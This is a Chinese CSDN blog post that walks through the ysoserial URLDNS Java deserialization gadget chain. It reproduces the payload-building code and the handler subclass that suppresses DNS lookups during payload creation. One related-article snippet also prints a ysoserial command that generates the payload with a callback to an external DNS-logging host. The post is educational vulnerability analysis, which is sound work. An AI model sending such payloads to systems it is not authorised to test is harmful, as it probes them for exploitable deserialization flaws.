JAVA之URLDNS链再分析

最新推荐文章于 2023-05-28 15:35:22 发布
最新推荐文章于 2023-05-28 15:35:22 发布
阅读量1k 收藏
点赞数 1
分类专栏: java安全 文章标签: java 哈希算法 散列表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50589021/article/details/123071714
版权

URLDNS链再分析

readObject()方法

Java反序列化会调用对应的readobject方法
比如我创建一个类test。序列化test类就会调用writeobject方法,
反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法
在HashMap类中,恰恰存在readobject方法

以ysoserial的payload为例,作者有明确指出

 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

我先是把这条链子跟完了,现在分析一下他的payload

public Object getObject(final String url) throws Exception {
	URLStreamHandler handler = new SilentURLStreamHandler();
	HashMap ht = new HashMap(); 
	URL u = new URL(null, url, handler); 
	ht.put(u, url); 
	Reflections.setFieldValue(u, "hashCode", -1); 
	return ht;
}

整条链子加起来不到5行,他第一步先是实例化了一个URLStreamHandler的对象,但是这里用的是它的子类,因为后面你调试的时候会发现,他本是是一个抽象类,想要实例化只能选择继承他的子类,而这里作者是在下面自己继承了一个子类

        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                    return null;
                }
        }

第一行的openConnection方法是必须被子类重写的,我们可以回到URLStreamHandler他有对这个抽象方法的介绍:Opens a connection to the object referenced by the URL argument. This method should be overridden by a subclass.意思就是子类应该覆盖该方法,而且这个方法也是抽象方法,子类必须要对它实现

而第二行,经过我反复测试,当把这一行代码删除的时候,dns的请求次数会+1,也就是说之所以要有一个return null是为了防止在poc创建的时候触发dns请求,而无法判断是否是链条本身触发的dns请求,他本身也有解释:**此UrlStreamHandler的实例用于在创建URL实例时避免任何DNS解析。**DNS分辨率用于漏洞检测。重要的是使用序列化对象先前探测给定的URL。潜在假阴性:如果首先从测试器计算机解析DNS名称,则目标服务器可能会在第二分辨率上获取缓存。

链子分析:

首先就是利用HashMap.readObject()方法在反序列化的时候作为触发点,其中putVal(hash(key), key, value, false, false);的hash方法会对key进行处理,而这里的key就是我们创建的url对象,那么他是如何赋值的:利用ht.put(u, url);作为下一个跳板,来调用URL u的hashcode并用Reflections.setFieldValue(u, “hashCode”, -1); 对URL的对象u的参数进行调整,再利用其hashcode调用URLStreamHandler的hashcode来进行dns请求,达到我们的要求

Yn8rt
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JAVA上百实例源码以及开源项目
01-03
通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、保存私钥到文件privateKey.dat、如何用Java对象序列化保存私钥,通常应对私钥加密后再保存、如何从...
Java代码审计13之URLDNS
最新发布
划水的小白白
08-22 384
1、简介urldns 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URL类hashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
Java反序列化之URLDNS
m0_62466350的博客
05-28 701
URLDNSjava原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
java-URLDNS分析
qq_62613905的博客
01-29 327
URLDNS分析
Java反序列化1-URLDNS利用分析
weixin_43263451的博客
06-26 1120
之前一段时间一直在学习了java,也有刷过一段时间的java靶场。最近想着也应该开始学习java反序列化相关知识了,今天就从java反序列化中最简单的URLDNS开始分析URLDNS不需要依赖第三方的包,同时不限制jdk的版本URLDNS并不能执行命令,只能发送DNS请求该条基本没什么危害,通常做为检测反序列化的入口点使用序列化 反序列化 上面就是java序列化与反序列化一个简单的例子。java的序列化与反序列化所使用的函数时writeObject和readObject,java也允许开发者去自己定义
Java反序列化】URLDNS
m0_61572518的博客
04-14 2439
序列化代码: import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class UrlDnsClient { public static void main(String[] args)
java开源包1
06-28
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的接,以及接之上的接。它在搜索的同时可以下载遇到的接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
java开源包8
06-28
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的接,以及接之上的接。它在搜索的同时可以下载遇到的接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
java开源包11
06-28
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的接,以及接之上的接。它在搜索的同时可以下载遇到的接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
java开源包101
07-13
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的接,以及接之上的接。它在搜索的同时可以下载遇到的接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
使用Java实现DNS域名解析的简单示例
09-03
主要介绍了使用Java实现DNS域名解析的简单示例,包括对一个动态IP主机的域名解析例子,需要的朋友可以参考下
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 805
[Java反序列化]—URLDNS 分析
[Java反序列化]—URLDNS
Sentiment的博客
04-14 1138
前言 URLDNS不能执行命令,但通常作为验证是否存在反序列化漏洞的一种方式,学习反序列化应先从URLDNS说起,因为它子短、易理解。 ysoserial 再谈URLDNS前,一定要说的一个工具ysoserial,ysoserial集合了各种java反序列化payload,可以说是Java反序列化的一个里程碑 工具使用 ysoserial 源码 ysoserial.jar ysoserial.jar java -jar ysoserial-[version]-all.jar [payload type]
java url dns_JAVA反序列化之URLDNS分析
weixin_34093899的博客
02-13 240
前言从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用,这次先从其中的一个可以说是最简单的利用URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
Java安全——URLDNS利用
qq_51663706的博客
09-06 1117
URLDNS利用
java url dns_Java安全之URLDNS
weixin_31677427的博客
02-16 204
Java安全之URLDNS1|10x00 前言在学习Java的反序列化漏洞的时候,就不得不学习他的一个利用。很多刚刚入门的对于利用这个词可能比较陌生。那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。1|20x01 Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久...
java url dns_Java反序列化之URLDNS分析
weixin_42504279的博客
02-24 752
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
Java 反序列化URLDNS利用 调试分析
wsitcj的博客
03-10 1165
事前准备 他的利用 * Gadget Chain: * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode() 生成payload: java -jar ysoserial.jar URLDNS http://xxx.ceye.io >out.bin java -jar ysoserial.jar URLDNS http://kjo3
JavaURL编程爬取并分析网页敏感词
05-21
首先,你需要引入 JavaURL 和 IO 相关的库,代码如下: ```java import java.io.BufferedReader; import java.io.InputStreamReader; import java.net.URL; ``` 接下来,你需要定义一个方法来获取网页的内容,代码如下: ```java public static String getHtml(String urlString) throws Exception { // 创建 URL 对象 URL url = new URL(urlString); // 打开连接 BufferedReader reader = new BufferedReader(new InputStreamReader(url.openStream())); // 读取数据 String line; StringBuilder stringBuilder = new StringBuilder(); while ((line = reader.readLine()) != null) { stringBuilder.append(line); } reader.close(); // 返回网页内容 return stringBuilder.toString(); } ``` 在这个方法中,你需要传入一个字符串类型的参数 `urlString`,表示需要爬取的网页地址。然后,通过 `URL` 类创建一个连接对象,用 `BufferedReader` 类读取网页内容,最后返回一个字符串类型的内容。 接下来,你需要定义一个方法来分析网页敏感词,代码如下: ```java public static boolean analyzeHtml(String htmlContent, String[] sensitiveWords) { // 遍历所有敏感词 for (String word : sensitiveWords) { // 判断当前敏感词是否存在于网页中 if (htmlContent.contains(word)) { return true; } } return false; } ``` 在这个方法中,你需要传入两个参数:一个是字符串类型的 `htmlContent`,表示需要分析的网页内容;另一个是字符串类型的 `sensitiveWords`,表示需要检测的敏感词数组。方法中会遍历所有敏感词,判断当前敏感词是否存在于网页中,如果存在则返回 true,表示网页包含敏感词;否则返回 false,表示网页不包含敏感词。 最后,你可以在主函数中调用以上两个方法,代码如下: ```java public static void main(String[] args) { try { // 爬取网页内容 String htmlContent = getHtml("https://www.example.com/"); // 敏感词数组 String[] sensitiveWords = {"敏感词1", "敏感词2", "敏感词3"}; // 分析网页敏感词 boolean hasSensitiveWords = analyzeHtml(htmlContent, sensitiveWords); if (hasSensitiveWords) { System.out.println("网页包含敏感词"); } else { System.out.println("网页不包含敏感词"); } } catch (Exception e) { e.printStackTrace(); } } ``` 在这个示例中,我们爬取了一个网页的内容,并定义了一个敏感词数组,然后调用了分析网页敏感词的方法。如果网页包含敏感词,则输出 `网页包含敏感词`;否则输出 `网页不包含敏感词`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值